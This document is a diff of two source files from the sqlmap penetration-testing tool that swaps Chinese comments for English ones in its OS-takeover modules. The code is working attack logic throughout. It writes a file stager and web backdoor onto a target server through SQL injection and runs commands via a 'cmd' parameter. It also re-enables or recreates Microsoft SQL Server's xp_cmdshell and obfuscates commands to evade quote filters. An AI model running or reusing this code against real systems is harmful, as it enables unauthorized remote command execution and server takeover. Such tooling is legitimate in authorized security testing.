+from lib.core.common import randomStr
+from lib.core.common import readInput
+from lib.core.common import singleTimeWarnMessage
+from lib.core.compat import xrange
+from lib.core.convert import encodeHex
+from lib.core.convert import getBytes
+from lib.core.convert import getText
+from lib.core.convert import getUnicode
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import paths
+from lib.core.datatype import OrderedSet
+from lib.core.enums import DBMS
+from lib.core.enums import HTTP_HEADER
+from lib.core.enums import OS
+from lib.core.enums import PAYLOAD
+from lib.core.enums import PLACE
+from lib.core.enums import WEB_PLATFORM
+from lib.core.exception import SqlmapNoneDataException
+from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
+from lib.core.settings import EVENTVALIDATION_REGEX
+from lib.core.settings import SHELL_RUNCMD_EXE_TAG
+from lib.core.settings import SHELL_WRITABLE_DIR_TAG
+from lib.core.settings import VIEWSTATE_REGEX
+from lib.request.connect import Connect as Request
+from thirdparty.six.moves import urllib as _urllib

 class Web(object):
    """
-    这个类定义了Web相关的操作系统接管功能。
-    主要用于上传和执行Web后门,实现对目标系统的远程控制。
+    This class defines web-oriented OS takeover functionalities for
+    plugins.
    """

    def __init__(self):
-        """
-        初始化Web类的属性
-        """
-        self.webPlatform = None  # Web平台类型(PHP/ASP/ASPX等)
-        self.webBaseUrl = None  # Web根URL
-        self.webBackdoorUrl = None  # 后门URL
-        self.webBackdoorFilePath = None  # 后门文件路径
-        self.webStagerUrl = None  # 文件上传器URL
-        self.webStagerFilePath = None  # 文件上传器路径
-        self.webDirectory = None  # Web目录
+        self.webPlatform = None
+        self.webBaseUrl = None
+        self.webBackdoorUrl = None
+        self.webBackdoorFilePath = None
+        self.webStagerUrl = None
+        self.webStagerFilePath = None
+        self.webDirectory = None

    def webBackdoorRunCmd(self, cmd):
-        """
-        通过Web后门执行系统命令
-        
-        参数:
-            cmd: 要执行的命令
-            
-        返回:
-            命令执行的输出结果
-        """
        if self.webBackdoorUrl is None:
            return

@ -97,13 +83,10 @@ class Web(object):
        if not cmd:
            cmd = conf.osCmd

-        # 构造命令执行URL
        cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, getUnicode(cmd))
-        # 发送请求执行命令
        page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)

        if page is not None:
-            # 从响应中提取命令输出
            output = re.search(r"<pre>(.+?)</pre>", page, re.I | re.S)

            if output:
@ -112,30 +95,18 @@ class Web(object):
        return output

    def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
-        """
-        上传文件到目标服务器
-        
-        参数:
-            destFileName: 目标文件名
-            directory: 目标目录
-            stream: 文件流对象
-            content: 文件内容
-            filepath: 本地文件路径
-            
-        返回:
-            上传是否成功
-        """
        if filepath is not None:
            if filepath.endswith('_'):
-                content = decloak(filepath)  # 解密混淆文件
+                content = decloak(filepath)  # cloaked file
            else:
                with openFile(filepath, "rb", encoding=None) as f:
                    content = f.read()

        if content is not None:
-            stream = io.BytesIO(getBytes(content))  # 将内容转换为字节流
+            stream = io.BytesIO(getBytes(content))  # string content

-            # 设置流的长度属性
+            # Reference: https://github.com/sqlmapproject/sqlmap/issues/3560
+            # Reference: https://stackoverflow.com/a/4677542
            stream.seek(0, os.SEEK_END)
            stream.len = stream.tell()
            stream.seek(0, os.SEEK_SET)
@ -143,18 +114,7 @@ class Web(object):
        return self._webFileStreamUpload(stream, destFileName, directory)

    def _webFileStreamUpload(self, stream, destFileName, directory):
-        """
-        通过文件流上传文件的内部方法
-        
-        参数:
-            stream: 文件流对象
-            destFileName: 目标文件名
-            directory: 目标目录
-            
-        返回:
-            上传是否成功
-        """
-        stream.seek(0)  # 重置流位置
+        stream.seek(0)  # Rewind

        try:
            setattr(stream, "name", destFileName)
@ -162,19 +122,16 @@ class Web(object):
            pass

        if self.webPlatform in getPublicTypeMembers(WEB_PLATFORM, True):
-            # 构造多部分表单数据
            multipartParams = {
                "upload": "1",
                "file": stream,
                "uploadDir": directory,
            }

-            # 对ASP.NET平台添加特殊参数
            if self.webPlatform == WEB_PLATFORM.ASPX:
                multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
                multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE

-            # 发送上传请求
            page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)

            if "File uploaded" not in (page or ""):
@ -189,22 +146,10 @@ class Web(object):
            return False

    def _webFileInject(self, fileContent, fileName, directory):
-        """
-        通过SQL注入写入文件的内部方法
-        
-        参数:
-            fileContent: 文件内容
-            fileName: 文件名
-            directory: 目标目录
-            
-        返回:
-            注入结果页面
-        """
        outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
        uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
        query = ""

-        # 根据注入技术构造查询
        if isTechniqueAvailable(getTechnique()):
            where = getTechniqueData().where

@ -212,9 +157,8 @@ class Web(object):
                randInt = randomInt()
                query += "OR %d=%d " % (randInt, randInt)

-        # 构造写文件的SQL语句
        query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=encodeHex(uplQuery, binary=False))
-        query = agent.prefixQuery(query)
+        query = agent.prefixQuery(query)        # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
        payload = agent.payload(newValue=query)
        page = Request.queryPage(payload)

@ -222,32 +166,26 @@ class Web(object):

    def webInit(self):
        """
-        初始化Web后门
-        该方法用于在Web服务器的可写目录中写入Web后门(代理)
+        This method is used to write a web backdoor (agent) on a writable
+        remote directory within the web server document root.
        """

-        # 如果已经初始化过,直接返回
        if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None:
            return

-        # 检查数据库和操作系统类型
        self.checkDbmsOs()

-        # 确定Web平台类型
        default = None
        choices = list(getPublicTypeMembers(WEB_PLATFORM, True))

-        # 根据URL后缀猜测Web平台
        for ext in choices:
            if conf.url.endswith(ext):
                default = ext
                break

-        # 如果无法猜测,根据操作系统设置默认值
        if not default:
            default = WEB_PLATFORM.ASP if Backend.isOs(OS.WINDOWS) else WEB_PLATFORM.PHP

-        # 提示用户选择Web平台
        message = "which web application language does the web server "
        message += "support?\n"

@ -260,7 +198,6 @@ class Web(object):

        message = message[:-1]

-        # 获取用户输入的Web平台选择
        while True:
            choice = readInput(message, default=str(default))

@ -274,7 +211,6 @@ class Web(object):
                self.webPlatform = choices[int(choice) - 1]
                break

-        # 尝试获取完整的文件路径信息
        if not kb.absFilePaths:
            message = "do you want sqlmap to further try to "
            message += "provoke the full path disclosure? [Y/n] "
@ -283,7 +219,6 @@ class Web(object):
                headers = {}
                been = set([conf.url])

-                # 尝试访问WordPress相关路径
                for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I):
                    url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
                    if url not in been:
@ -295,7 +230,6 @@ class Web(object):
                        finally:
                            been.add(url)

-                # 尝试访问带~的URL
                url = re.sub(r"(\.\w+)\Z", r"~\g<1>", conf.url)
                if url not in been:
                    try:
@ -306,7 +240,6 @@ class Web(object):
                    finally:
                        been.add(url)

-                # 尝试不同的参数注入方式
                for place in (PLACE.GET, PLACE.POST):
                    if place in conf.parameters:
                        value = re.sub(r"(\A|&)(\w+)=", r"\g<2>[]=", conf.parameters[place])
@ -314,7 +247,6 @@ class Web(object):
                            page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
                            parseFilePaths(page)

-                # 尝试Cookie注入
                cookie = None
                if PLACE.COOKIE in conf.parameters:
                    cookie = conf.parameters[PLACE.COOKIE]
@ -332,12 +264,10 @@ class Web(object):
                        page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
                        parseFilePaths(page)

-        # 获取可能的目标目录列表
        directories = list(arrayizeValue(getManualDirectories()))
        directories.extend(getAutoDirectories())
        directories = list(OrderedSet(directories))

-        # 处理URL路径
        path = _urllib.parse.urlparse(conf.url).path or '/'
        path = re.sub(r"/[^/]*\.\w+\Z", '/', path)
        if path != '/':
@ -348,39 +278,33 @@ class Web(object):
                    _.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
            directories = _

-        # 生成后门文件名和内容
        backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webPlatform)
        backdoorContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webPlatform)))

-        # 获取文件上传器内容
        stagerContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform)))

-        # 遍历目录尝试上传后门
        for directory in directories:
            if not directory:
                continue

-            # 生成上传器文件名和路径
            stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform)
            self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

            uploaded = False
            directory = ntToPosixSlashes(normalizePath(directory))

-            # 规范化目录路径
            if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
                directory = "/%s" % directory

            if not directory.endswith('/'):
                directory += '/'

-            # 尝试通过LIMIT方法上传文件上传器
+            # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
            infoMsg = "trying to upload the file stager on '%s' " % directory
            infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
            logger.info(infoMsg)
            self._webFileInject(stagerContent, stagerName, directory)

-            # 检查上传器是否可访问
            for match in re.finditer('/', directory):
                self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
                self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName)
@ -394,7 +318,7 @@ class Web(object):
                    uploaded = True
                    break

-            # 如果LIMIT方法失败,尝试使用UNION查询方法
+            # Fall-back to UNION queries file upload method
            if not uploaded:
                warnMsg = "unable to upload the file stager "
                warnMsg += "on '%s'" % directory
@ -408,20 +332,16 @@ class Web(object):
                    stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform)
                    self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)

-                    # 创建临时文件
                    handle, filename = tempfile.mkstemp()
                    os.close(handle)

-                    # 写入上传器内容
                    with openFile(filename, "w+b") as f:
                        _ = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform)))
                        _ = _.replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
                        f.write(_)

-                    # 通过UNION查询上传文件
                    self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)

-                    # 检查上传器是否可访问
                    for match in re.finditer('/', directory):
                        self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
                        self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName)
@ -439,14 +359,12 @@ class Web(object):
            if not uploaded:
                continue

-            # 检查上传器是否被正确解释执行
            if "<%" in uplPage or "<?" in uplPage:
                warnMsg = "file stager uploaded on '%s', " % directory
                warnMsg += "but not dynamically interpreted"
                logger.warning(warnMsg)
                continue

-            # 处理ASP.NET特殊参数
            elif self.webPlatform == WEB_PLATFORM.ASPX:
                kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
                kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
@ -455,7 +373,6 @@ class Web(object):
            infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
            logger.info(infoMsg)

-            # 处理ASP平台特殊情况
            if self.webPlatform == WEB_PLATFORM.ASP:
                match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)

@ -464,7 +381,6 @@ class Web(object):
                else:
                    continue

-                # 上传后门和命令执行组件
                _ = "tmpe%s.exe" % randomStr(lowercase=True)
                if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)):
                    self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_"))
@ -474,7 +390,6 @@ class Web(object):
                    continue

            else:
-                # 上传后门文件
                if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
                    warnMsg = "backdoor has not been successfully uploaded "
                    warnMsg += "through the file stager possibly because "
@ -486,7 +401,6 @@ class Web(object):
                    warnMsg += "different servers"
                    logger.warning(warnMsg)

-                    # 询问是否使用相同方法重试
                    message = "do you want to try the same method used "
                    message += "for the file stager? [Y/n] "

@ -500,7 +414,6 @@ class Web(object):

            self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)

-            # 测试后门是否可用
            testStr = "command execution test"
            output = self.webBackdoorRunCmd("echo %s" % testStr)

--- a/src/sqlmap-master/lib/takeover/xp_cmdshell.py
+++ b/src/sqlmap-master/lib/takeover/xp_cmdshell.py
@ -5,109 +5,76 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的模块和函数
-from lib.core.agent import agent  # 导入agent模块,用于执行SQL命令
-from lib.core.common import Backend  # 导入Backend模块,用于获取数据库后端信息
-from lib.core.common import flattenValue  # 导入flattenValue函数,用于将嵌套列表展平成一维列表
-from lib.core.common import getLimitRange  # 导入getLimitRange函数,用于获取分页查询的范围
-from lib.core.common import getSQLSnippet  # 导入getSQLSnippet函数,用于获取预定义的SQL代码片段
-from lib.core.common import hashDBWrite  # 导入hashDBWrite函数,用于将数据写入哈希数据库
-from lib.core.common import isListLike  # 导入isListLike函数,用于判断对象是否类似列表
-from lib.core.common import isNoneValue  # 导入isNoneValue函数,用于判断值是否为None
-from lib.core.common import isNumPosStrValue  # 导入isNumPosStrValue函数,用于判断字符串是否为正数
-from lib.core.common import isTechniqueAvailable  # 导入isTechniqueAvailable函数,用于检查SQL注入技术是否可用
-from lib.core.common import popValue  # 导入popValue函数,用于从栈中弹出值
-from lib.core.common import pushValue  # 导入pushValue函数,用于将值压入栈
-from lib.core.common import randomStr  # 导入randomStr函数,用于生成随机字符串
-from lib.core.common import readInput  # 导入readInput函数,用于读取用户输入
-from lib.core.common import wasLastResponseDelayed  # 导入wasLastResponseDelayed函数,用于检查上次响应是否有延迟
-from lib.core.compat import xrange  # 导入xrange函数,用于兼容Python2和3的range函数
-from lib.core.convert import encodeHex  # 导入encodeHex函数,用于十六进制编码
-from lib.core.data import conf  # 导入conf模块,用于访问全局配置
-from lib.core.data import kb  # 导入kb模块,用于访问知识库
-from lib.core.data import logger  # 导入logger模块,用于日志记录
-from lib.core.decorators import stackedmethod  # 导入stackedmethod装饰器,用于堆叠查询方法
-from lib.core.enums import CHARSET_TYPE  # 导入CHARSET_TYPE枚举,定义字符集类型
-from lib.core.enums import DBMS  # 导入DBMS枚举,定义数据库类型
-from lib.core.enums import EXPECTED  # 导入EXPECTED枚举,定义期望的返回类型
-from lib.core.enums import HASHDB_KEYS  # 导入HASHDB_KEYS枚举,定义哈希数据库的键
-from lib.core.enums import PAYLOAD  # 导入PAYLOAD枚举,定义SQL注入的载荷类型
-from lib.core.exception import SqlmapUnsupportedFeatureException  # 导入异常类,用于不支持的功能
-from lib.core.threads import getCurrentThreadData  # 导入getCurrentThreadData函数,用于获取当前线程数据
-from lib.request import inject  # 导入inject模块,用于执行SQL注入
+from lib.core.agent import agent
+from lib.core.common import Backend
+from lib.core.common import flattenValue
+from lib.core.common import getLimitRange
+from lib.core.common import getSQLSnippet
+from lib.core.common import hashDBWrite
+from lib.core.common import isListLike
+from lib.core.common import isNoneValue
+from lib.core.common import isNumPosStrValue
+from lib.core.common import isTechniqueAvailable
+from lib.core.common import popValue
+from lib.core.common import pushValue
+from lib.core.common import randomStr
+from lib.core.common import readInput
+from lib.core.common import wasLastResponseDelayed
+from lib.core.compat import xrange
+from lib.core.convert import encodeHex
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.decorators import stackedmethod
+from lib.core.enums import CHARSET_TYPE
+from lib.core.enums import DBMS
+from lib.core.enums import EXPECTED
+from lib.core.enums import HASHDB_KEYS
+from lib.core.enums import PAYLOAD
+from lib.core.exception import SqlmapUnsupportedFeatureException
+from lib.core.threads import getCurrentThreadData
+from lib.request import inject

 class XP_cmdshell(object):
    """
-    这个类用于处理Microsoft SQL Server的xp_cmdshell扩展存储过程
-    xp_cmdshell是SQL Server提供的一个系统存储过程,可以执行操作系统命令
-    该类提供了创建、配置、测试和执行xp_cmdshell的各种方法
+    This class defines methods to deal with Microsoft SQL Server
+    xp_cmdshell extended procedure for plugins.
    """

    def __init__(self):
-        """
-        初始化XP_cmdshell类的实例
-        设置xp_cmdshell存储过程的默认名称为master..xp_cmdshell
-        """
-        self.xpCmdshellStr = "master..xp_cmdshell"  # 设置默认的xp_cmdshell存储过程名称
+        self.xpCmdshellStr = "master..xp_cmdshell"

    def _xpCmdshellCreate(self):
-        """
-        创建新的xp_cmdshell存储过程
-        当原始的xp_cmdshell被禁用时,可以创建一个新的具有相同功能的存储过程
-        主要步骤:
-        1. 对于非SQL Server 2000版本,需要先激活sp_OACreate
-        2. 生成随机字符串作为新存储过程名称的一部分
-        3. 执行创建存储过程的SQL命令
-        """
        cmd = ""

-        # 如果不是SQL Server 2000版本,需要先激活sp_OACreate
        if not Backend.isVersionWithin(("2000",)):
-            logger.debug("激活sp_OACreate")
-            # 获取激活sp_OACreate的SQL代码片段
+            logger.debug("activating sp_OACreate")
+
            cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
            inject.goStacked(agent.runAsDBMSUser(cmd))

-        # 生成随机字符串作为新存储过程的一部分
-        self._randStr = randomStr(lowercase=True)  # 生成小写随机字符串
-        self.xpCmdshellStr = "master..new_xp_cmdshell"  # 设置新的存储过程名称
+        self._randStr = randomStr(lowercase=True)
+        self.xpCmdshellStr = "master..new_xp_cmdshell"

-        # 获取创建新xp_cmdshell的SQL代码片段
        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)

-        # 如果不是SQL Server 2000,需要重新配置
        if not Backend.isVersionWithin(("2000",)):
            cmd += ";RECONFIGURE WITH OVERRIDE"

-        inject.goStacked(agent.runAsDBMSUser(cmd))  # 执行创建命令
+        inject.goStacked(agent.runAsDBMSUser(cmd))

    def _xpCmdshellConfigure2005(self, mode):
-        """
-        配置SQL Server 2005及更高版本的xp_cmdshell
-        
-        参数:
-            mode: 整数,1表示启用xp_cmdshell,0表示禁用
-        
-        返回:
-            str: 配置xp_cmdshell的SQL命令
-        """
-        debugMsg = "使用sp_configure存储过程配置xp_cmdshell"
+        debugMsg = "configuring xp_cmdshell using sp_configure "
+        debugMsg += "stored procedure"
        logger.debug(debugMsg)

        cmd = getSQLSnippet(DBMS.MSSQL, "configure_xp_cmdshell", ENABLE=str(mode))
+
        return cmd

    def _xpCmdshellConfigure2000(self, mode):
-        """
-        配置SQL Server 2000版本的xp_cmdshell
-        
-        参数:
-            mode: 整数,1表示启用xp_cmdshell,0表示禁用
-            
-        返回:
-            str: 配置xp_cmdshell的SQL命令
-        """
-        debugMsg = "使用sp_addextendedproc存储过程配置xp_cmdshell"
+        debugMsg = "configuring xp_cmdshell using sp_addextendedproc "
+        debugMsg += "stored procedure"
        logger.debug(debugMsg)

        if mode == 1:
@ -118,97 +85,68 @@ class XP_cmdshell(object):
        return cmd

    def _xpCmdshellConfigure(self, mode):
-        """
-        根据SQL Server版本配置xp_cmdshell
-        会自动判断SQL Server版本并调用相应的配置方法
-        
-        参数:
-            mode: 整数,1表示启用xp_cmdshell,0表示禁用
-        """
        if Backend.isVersionWithin(("2000",)):
-            cmd = self._xpCmdshellConfigure2000(mode)  # SQL Server 2000版本
+            cmd = self._xpCmdshellConfigure2000(mode)
        else:
-            cmd = self._xpCmdshellConfigure2005(mode)  # SQL Server 2005及以上版本
+            cmd = self._xpCmdshellConfigure2005(mode)

-        inject.goStacked(agent.runAsDBMSUser(cmd))  # 执行配置命令
+        inject.goStacked(agent.runAsDBMSUser(cmd))

    def _xpCmdshellCheck(self):
-        """
-        检查xp_cmdshell是否可用
-        通过执行ping命令并检查响应延迟来测试xp_cmdshell的可用性
-        
-        返回:
-            bool: True表示xp_cmdshell可用,False表示不可用
-        """
-        # 使用ping命令测试,延迟时间为配置的时间的2倍
        cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2)
        self.xpCmdshellExecCmd(cmd)

-        return wasLastResponseDelayed()  # 返回是否发生了预期的延迟
+        return wasLastResponseDelayed()

    @stackedmethod
    def _xpCmdshellTest(self):
-        """
-        测试xp_cmdshell的功能是否正常
-        通过执行简单的echo命令来验证xp_cmdshell是否能正常工作
-        同时检查是否有权限写入临时目录
-        """
        threadData = getCurrentThreadData()
        pushValue(threadData.disableStdOut)
        threadData.disableStdOut = True

-        logger.info("测试xp_cmdshell扩展存储过程是否可用")
-        output = self.xpCmdshellEvalCmd("echo 1")  # 执行测试命令
+        logger.info("testing if xp_cmdshell extended procedure is usable")
+        output = self.xpCmdshellEvalCmd("echo 1")

        if output == "1":
-            logger.info("xp_cmdshell扩展存储过程可用")
+            logger.info("xp_cmdshell extended procedure is usable")
        elif isNoneValue(output) and conf.dbmsCred:
-            errMsg = "似乎后端文件系统中用于存储控制台输出的临时目录('%s')" % self.getRemoteTempPath()
-            errMsg += "对DBMS进程没有写入权限。"
-            errMsg += "建议您使用'--tmp-path'选项手动调整，"
-            errMsg += "否则将无法获取命令输出"
+            errMsg = "it seems that the temporary directory ('%s') used for " % self.getRemoteTempPath()
+            errMsg += "storing console output within the back-end file system "
+            errMsg += "does not have writing permissions for the DBMS process. "
+            errMsg += "You are advised to manually adjust it with option "
+            errMsg += "'--tmp-path' or you won't be able to retrieve "
+            errMsg += "the command(s) output"
            logger.error(errMsg)
        elif isNoneValue(output):
-            logger.error("无法获取xp_cmdshell输出")
+            logger.error("unable to retrieve xp_cmdshell output")
        else:
-            logger.info("xp_cmdshell扩展存储过程可用")
+            logger.info("xp_cmdshell extended procedure is usable")

        threadData.disableStdOut = popValue()

    def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile):
-        """
-        使用xp_cmdshell写入文件
-        通过echo命令将内容写入指定的文件
-        
-        参数:
-            fileContent: 要写入的文件内容
-            tmpPath: 临时文件路径
-            randDestFile: 随机生成的目标文件名
-        """
-        echoedLines = []  # 存储echo命令行
-        cmd = ""  # 最终要执行的命令
-        charCounter = 0  # 字符计数器
-        maxLen = 512  # 单条命令最大长度
-
-        # 处理文件内容,转换为行列表
+        echoedLines = []
+        cmd = ""
+        charCounter = 0
+        maxLen = 512
+
        if isinstance(fileContent, (set, list, tuple)):
            lines = fileContent
        else:
            lines = fileContent.split("\n")

-        # 为每行内容创建echo命令
        for line in lines:
            echoedLine = "echo %s " % line
            echoedLine += ">> \"%s\\%s\"" % (tmpPath, randDestFile)
            echoedLines.append(echoedLine)

-        # 分批执行命令以避免命令过长
        for echoedLine in echoedLines:
            cmd += "%s & " % echoedLine
            charCounter += len(echoedLine)

            if charCounter >= maxLen:
                self.xpCmdshellExecCmd(cmd.rstrip(" & "))
+
                cmd = ""
                charCounter = 0

@ -216,23 +154,17 @@ class XP_cmdshell(object):
            self.xpCmdshellExecCmd(cmd.rstrip(" & "))

    def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
-        """
-        构造xp_cmdshell命令
-        将要执行的命令封装成SQL语句
-        
-        参数:
-            cmd: 要执行的命令
-            insertIntoTable: 存储结果的表名
-            
-        返回:
-            str: 构造好的SQL命令
-        """
-        # 当用户提供DBMS凭据时,需要将命令输出重定向到临时文件
+        # When user provides DBMS credentials (with --dbms-cred) we need to
+        # redirect the command standard output to a temporary file in order
+        # to retrieve it afterwards
+        # NOTE: this does not need to be done when the command is 'del' to
+        # delete the temporary file
        if conf.dbmsCred and insertIntoTable:
            self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
            cmd = "%s > \"%s\"" % (cmd, self.tmpFile)

-        # 混淆要执行的命令,也可用于绕过单引号过滤
+        # Obfuscate the command to execute, also useful to bypass filters
+        # on single-quotes
        self._randStr = randomStr(lowercase=True)
        self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr

@ -241,7 +173,11 @@ class XP_cmdshell(object):
        except UnicodeError:
            self._forgedCmd += "SET @%s='%s';" % (self._randStr, cmd)

-        # 将命令输出插入支持表'sqlmapoutput'
+        # Insert the command standard output into a support table,
+        # 'sqlmapoutput', except when DBMS credentials are provided because
+        # it does not work unfortunately, BULK INSERT needs to be used to
+        # retrieve the output when OPENROWSET is used hence the redirection
+        # to a temporary file from above
        if insertIntoTable and not conf.dbmsCred:
            self._forgedCmd += "INSERT INTO %s(data) " % insertIntoTable

@ -250,34 +186,11 @@ class XP_cmdshell(object):
        return agent.runAsDBMSUser(self._forgedCmd)

    def xpCmdshellExecCmd(self, cmd, silent=False):
-        """
-        执行xp_cmdshell命令
-        
-        参数:
-            cmd: 要执行的命令
-            silent: 是否静默执行,不显示输出
-            
-        返回:
-            str: 命令执行结果
-        """
        return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent)

    def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
-        """
-        评估并执行xp_cmdshell命令,处理输出结果
-        支持直接模式和通过表存储结果两种方式
-        
-        参数:
-            cmd: 要执行的命令
-            first: 结果的起始位置
-            last: 结果的结束位置
-            
-        返回:
-            str: 处理后的命令输出结果
-        """
        output = None

-        # 直接模式执行
        if conf.direct:
            output = self.xpCmdshellExecCmd(cmd)

@ -292,21 +205,21 @@ class XP_cmdshell(object):

                output = new_output
        else:
-            # 通过支持表执行命令
            inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))

-            # 处理DBMS凭据情况下的命令输出
+            # When user provides DBMS credentials (with --dbms-cred), the
+            # command standard output is redirected to a temporary file
+            # The file needs to be copied to the support table,
+            # 'sqlmapoutput'
            if conf.dbmsCred:
                inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10)))
                self.delRemoteFile(self.tmpFile)

            query = "SELECT %s FROM %s ORDER BY id" % (self.tblField, self.cmdTblName)

-            # 使用不同的技术获取输出
            if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
                output = inject.getValue(query, resumeValue=False, blind=False, time=False)

-            # 如果没有输出,尝试分批获取
            if (output is None) or len(output) == 0 or output[0] is None:
                output = []
                count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
@ -316,10 +229,8 @@ class XP_cmdshell(object):
                        query = agent.limitQuery(index, query, self.tblField)
                        output.append(inject.getValue(query, union=False, error=False, resumeValue=False))

-            # 清理支持表
            inject.goStacked("DELETE FROM %s" % self.cmdTblName)

-            # 处理输出格式
            if output and isListLike(output) and len(output) > 1:
                _ = ""
                lines = [line for line in flattenValue(output) if line is not None]
@ -335,59 +246,57 @@ class XP_cmdshell(object):
        return output

    def xpCmdshellInit(self):
-        """
-        初始化xp_cmdshell功能
-        主要步骤:
-        1. 检查xp_cmdshell是否可用
-        2. 如果不可用,尝试启用或创建新的xp_cmdshell
-        3. 创建支持表用于存储命令输出
-        4. 测试xp_cmdshell功能
-        """
        if not kb.xpCmdshellAvailable:
-            infoMsg = "检查xp_cmdshell扩展存储过程是否可用,请稍候.."
+            infoMsg = "checking if xp_cmdshell extended procedure is "
+            infoMsg += "available, please wait.."
            logger.info(infoMsg)

            result = self._xpCmdshellCheck()

            if result:
-                logger.info("xp_cmdshell扩展存储过程可用")
+                logger.info("xp_cmdshell extended procedure is available")
                kb.xpCmdshellAvailable = True
+
            else:
-                message = "xp_cmdshell扩展存储过程似乎不可用。"
-                message += "是否要让sqlmap尝试重新启用它? [Y/n] "
+                message = "xp_cmdshell extended procedure does not seem to "
+                message += "be available. Do you want sqlmap to try to "
+                message += "re-enable it? [Y/n] "

                if readInput(message, default='Y', boolean=True):
                    self._xpCmdshellConfigure(1)

                    if self._xpCmdshellCheck():
-                        logger.info("xp_cmdshell成功重新启用")
+                        logger.info("xp_cmdshell re-enabled successfully")
                        kb.xpCmdshellAvailable = True
+
                    else:
-                        logger.warning("xp_cmdshell重新启用失败")
+                        logger.warning("xp_cmdshell re-enabling failed")

-                        logger.info("使用sp_OACreate创建xp_cmdshell")
+                        logger.info("creating xp_cmdshell with sp_OACreate")
                        self._xpCmdshellConfigure(0)
                        self._xpCmdshellCreate()

                        if self._xpCmdshellCheck():
-                            logger.info("xp_cmdshell创建成功")
+                            logger.info("xp_cmdshell created successfully")
                            kb.xpCmdshellAvailable = True
+
                        else:
-                            warnMsg = "xp_cmdshell创建失败,"
-                            warnMsg += "可能是因为sp_OACreate被禁用"
+                            warnMsg = "xp_cmdshell creation failed, probably "
+                            warnMsg += "because sp_OACreate is disabled"
                            logger.warning(warnMsg)

